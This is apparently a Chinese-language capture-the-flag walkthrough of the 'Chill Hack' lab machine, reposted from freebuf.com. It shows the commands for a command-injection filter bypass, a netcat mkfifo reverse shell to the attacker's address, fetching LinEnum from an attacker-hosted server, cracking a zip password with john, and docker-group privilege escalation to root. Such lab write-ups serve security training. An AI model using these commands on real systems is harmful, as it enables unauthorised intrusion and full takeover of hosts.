Chill Hack
基础信息
思路比较清晰明确,容易操作
靶机搭建
将镜像导入之后成功运行会显示该图片
主机发现与端口扫描
因为靶机与kali处于同一个网段可以使用nmap进行发现并进行端口扫描
nmap 192.168.1.0/24
nmap -sV -p- -A 192.168.1.106
发现开放了21 22 80 端口,对端口进行详细的扫描![%$RSWLAIGQPW1W0L~IL}6]5.png](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210206/1612620498_601ea2d27bd813c38c38b.png)
首先尝试连接21端口查看能否获得一些信息
用户名:anonymous 没有密码
发现存在note.txt
下载文件
get note.txt
发现没有很多有用的信息,进入80端口查看
没有发现可利用的信息
使用dirb爬取网页,发现了熟悉的页面
http://192.168.1.106/secret/
输入命令看看命令能否使用,输入id时正常返回页面但是当想要获取目录信息时会发现ls命令被过滤
尝试进行绕过
id;ls
发现命令成功执行
可以使用这种方法反弹shell
id;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.107 1234 >/tmp/f
获取交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
使用LinEnum爬取文件查看是否有可以利用的文件
首先开启临时端口将LinEnum下载到靶机的/tmp目录下
赋予权限并执行该脚本
python -m SimpleHTTPServer 8000
wget http://192.168.1.107:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
发现了个有意思的文件,进入目录进行查看
发现在该文件中存在一张图片我们可以下载下来进行查看
搭建临时网站
python3 -m http.server 8001
wget http://192.168.1.108:8001/images/hacker-with-laptop_23-2147985341.jpg
成功下载
steghide使用查看图片中是否含有隐藏文件,将文件下载下来
steghide info hacker-with-laptop_23-2147985341.jpg
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
提取出一个压缩包尝试解压发现需要密码
使用john进行爆破
zip2john backup.zip > backup.john
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john
john backup.john --show
获得密码:pass1word
再次对压缩包进行解压,这次解压成功
查看减压文件,发现使用base64加密的密码
解密之后密码为:!d0ntKn0wmYp@ssw0rd
进入/home目录下查看用户使用改密码尝试进行登录
提权
因为之前反弹获得的shell输入命令全部都是双写看着不习惯
因为开放了22端口可以使用ssh进行远程连接
sudo -l查看可使用命令
进入该目录使用ls -al 发现可执行脚本
执行之后发现好像没什么用,只能尝试其他方法
通过id发现anurodh属于docker用户组
使用该命令
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
提权成功
进入root目录获取flag
来源:freebuf.com 2021-02-07 11:58:07 by: WAFmax
请登录后发表评论
注册